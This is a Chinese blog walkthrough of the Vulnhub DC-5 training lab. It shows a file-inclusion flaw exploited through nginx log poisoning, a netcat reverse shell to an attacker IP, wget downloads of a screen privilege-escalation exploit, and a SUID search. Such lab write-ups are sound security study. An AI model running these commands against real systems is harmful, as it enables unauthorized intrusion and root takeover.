r0ckyzzz's Blog.

Vulnhub靶机DC-5通关笔记

Word count: 507Reading time: 2 min
2020/03/10 Share

Vulnhub靶机DC-5通关笔记

前言

下载地址:https://www.vulnhub.com/entry/dc-5,314/

开始

起手nmap扫描

upload successful

开放了80和111端口

upload successful

80端口是很简单的页面
交互的只有
thankyou.php

upload successful

接着看111端口的rpc服务

upload successful
都是拒绝服务的漏洞 没有什么实质的帮助

那怎么搞啊

记住做vulnhub的靶机 有一个很重要的经验就是要看下载页面的提示,虽然是英文但是可以少走很多弯路

upload successful

You need to look for something a little out of the ordinary (something that changes with a refresh of a page).
在一个随着刷新会改变的页面寻找与原来不同的东西

upload successful

注意到Copyright后面的数字会随着刷新的改变而改变,所以这里就是这道题的关键了

要fuzz一下

fuzz出来的结果是file=xxxx进行包含

upload successful
既然可以包含那就可以包含nginx文件来getshell了

upload successful

然后包含
/var/log/nginx/access.log
放入蚁剑 连接成功

upload successful

反弹shell
nc -e /bin/bash 192.168.3.55 77

upload successful

拿个bash好操作

python -c 'import pty;pty.spawn("/bin/bash")'

接下来的目的就是提权

sudo -l执行不了

看看SUID

find / -perm /4000 2>/dev/null

upload successful
screen这个是我接触过的
用来管理多重视窗的

这个可以用来提权吗?
查一下

upload successful

找到一个版本对应的本地权限提升的exp

upload successful

看看具体的用法

upload successful

看着exp的用法弄好

python -m SimpleHTTPServer

开启http的服务
然后用wget把我们的exp传入靶机的tmp目录

wget http://192.168.3.55:8000/libhax.so

wget http://192.168.3.55:8000/rootshell

然后跟着后面的操作

upload successful

upload successful

最终拿到flag

总结

这个靶机是做过最难的靶机 主要是因为fuzz的部分没想到 没想到藏着一个文件包含的漏洞,只要弄通了这一点后面的好解决了,但渗透的艺术就在于fuzz出一些隐藏的关键点从而攻破整个系统

CATALOG
  1. 1. Vulnhub靶机DC-5通关笔记
    1. 1.1. ¶前言
    2. 1.2. ¶开始
    3. 1.3. ¶总结